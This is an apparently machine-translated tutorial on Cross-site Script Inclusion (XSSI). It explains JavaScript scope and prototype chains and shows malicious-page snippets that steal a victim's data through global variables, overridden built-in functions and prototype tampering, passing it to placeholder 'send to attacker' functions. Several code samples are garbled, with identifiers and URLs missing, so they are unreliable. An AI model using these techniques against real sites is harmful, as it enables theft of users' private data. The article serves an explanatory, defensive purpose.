Dynamic JavaScript
JavaScript code is often dynamically combined with the server-side name. During this combination, user-related information is saved to these JavaScript code. When this JavaScript script is sent to the browsing end, the client's JavaScript will be put into use immediately. But the reality is that these scripts are likely to be introduced by third parties, and there is no limitation to the same-origin policy for introducing these scripts. Therefore, it is very likely that a web page controlled by an attacker will also be included in a dynamically generated JavaScript script and then observe the execution of the script and the possible security issues. Since all JavaScript scripts and local scripts imported through src will share global variables. Therefore, if such a dynamic script contains user privacy data, then the attacker can access this data by introducing the script. This method is also called Cross-site Script Inclusion (XSSI).
Language features of JavaScript
Among the harms of dynamic Javascript, it mainly involves the scope of JavaScript and the inheritance of prototype chains.
Scope issues
I believe many people have some understanding of the scope of JavaScript. If you don’t understand, you can search online. Unlike languages like Java and C++ that have block-level scopes, JavaScript only has function scopes. This means that the JavaScript engine will assign a scope to each function. The scope of the variable defined inside a function is within the function, and this scope is called the local scope. The following code clearly illustrates the difference between global scope and local scope.
Prototype chain
In JavaScript, each created function has a prototype property, which is a pointer to an object, and the purpose of this object is to contain properties and methods that can be shared by all instances of a specific type. In JavaScript, it mainly uses prototype chains as the main method of inheritance. The basic idea is to use prototypes to allow one application type to inherit the properties and methods of another application type. When accessing an object's properties, JavaScript determines whether the current object itself contains this property. If it does not exist, search in the object's prototype properties.
Attack method
Because script tags in HTM are not affected by homologous policies. Therefore, script resources can be imported into cross-domain pages. Although cross-domain pages cannot directly access the source code of these scripts, after importing this script, you can observe the execution of this script on the page. If such a dynamic script contains user's privacy data, then this method may leak user's data.
Global variable-based attacks
When a global variable is created in the imported JavaScript, this global variable can also be accessed by the JavaScript code in the page. Therefore, if a dynamic script assigns the user's privacy data to a global variable, the attacker can access the data through the global variable.
Assume that the JavaScript code in a normal script is as follows:
(function() {
= "345a8b7c9d8e34f5";
})();
As you can see, this script assigns the user's privacy data to the Windows global variable.
The code for a malicious site is:
<script src="/"></script> <script> var user_data= ; // send user data to hacker sendstolendata(user_data); </script>
When a user visits a website containing the malicious code above, the website will obtain user data through the window object and then send it to the attacker.
Redefine global API attacks
Due to the dynamic nature of JavaScript, many functions can be rewritten by attackers, even those built-in JavaScript. If a dynamic JavaScript script passes privacy data through built-in functions in a system, then the attacker can obtain the user's privacy data by rewriting the function before the function is called.
Assume that the JavaScript code in a normal script is as follows:
(function() {
var secret = "345a8b7c9d8e34f5";
(secret);
})();
It can be found that in this code, the JavaScript language is called()method. And this method can be completely exploited by hackers.
Here is the code from the malicious site:
<script type="text/javascript">
= function (user_data) {
sendstolendata(user_data);
}
</script>
<script type="text/javascript" src="/"></script>
When a user visits this site,()The method has been rewritten by the attacker, so when the imported code is executed, it is called()When the method of , the method written by the attacker is actually called. This way the user's information will be stolen.
Prototype tampering
As mentioned before, javaScript is based on prototype chains. When accessing an attribute of an object, the JavaScript interpreter will search through the prototype chain until the attribute is found. In the following code, we will have a clear understanding of this issue.
Assume that the JavaScript code in a normal script is as follows:
(function(){
var arr = ["secret1","secret2","secret3"];
var x = ();
})();
As can be seen from the code, there are 3 user-related privacy data in the arr array. Then the arr instance is calledslice()method. It is obvious that this method does not exist. Because the arr instance itself does not create and declare this method, and there is no such method in the Array object. But when such a situation occurs, the program does not report an error, it just means thatsliceThe method does not exist. So in this case, the programmer may not know that the arr instance he created has a method such as calling slice(). Then the above code is likely to be exploited by attackers.
Here is the code for the malicious site:
<script type="text/javascript">
= function() {
//send data to attacker
sendToAttackBackend(this);
}
</script>
<script type="text/javascript" src="/"></script>
When a user visits this website containing malicious code, the imported JavaScript must be executedsliceWhen the method is executed, the attacker added to Array will be called.sliceMethod, so sensitive data will be sent to the attacker.
Prevention
When developers are developing a website, it is best to separate the code from the data. Sensitive and important data should be saved in separate files so that these files will not be executed by the browser as JavaScript. At the same time, access permissions are also required for these static resources, which can only be accessed after the user logs in. In this case, the attacker cannot access this data even if he introduces this static resource.
Summarize
The above is all about the harm caused by dynamic JavaScript. I hope this article can help you in your study or work. If you have any questions, you can leave a message to communicate.